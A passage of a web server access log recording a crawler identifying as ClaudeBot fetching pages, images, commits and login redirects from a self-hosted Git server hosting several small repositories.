216.73.216.188] [Length 10048] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12724] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10815] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10811] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12171] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=rendered" [Client 216.73.216.188] [Length 11077] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=open&type=all" [Client 216.73.216.188] [Length 10111] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 15700] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Freleases" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10816] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16471] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 12926] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14198] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11930] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10816] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13929] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13869] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 15273] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14659] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 216.73.216.188] [Length 10935] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2Fprojects.sln" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 22186] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16317] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15758] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fwiki" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 11123] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=rendered" [Client 216.73.216.188] [Length 11049] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx.conf" [Client 216.73.216.188] [Length 10048] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/nginx.conf" [Client 216.73.216.188] [Length 1476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factions" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12754] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 216.73.216.188] [Length 11077] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fbranches" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fwatchers" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Freleases" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11206] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11531] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11511] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.gitignore" [Client 216.73.216.188] [Length 898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 23191] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fmail_contact.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 23186] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.gitignore" [Client 216.73.216.188] [Length 9816] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11525] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19854] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fwiki" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11519] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnginx.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.gitignore" [Client 216.73.216.188] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factions" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fbranches" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup" [Client 216.73.216.188] [Length 9748] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fpackages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12126] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fwatchers" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 11678] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=source" [Client 216.73.216.188] [Length 11171] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 11680] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 60531] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Ffind%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10853] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10853] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 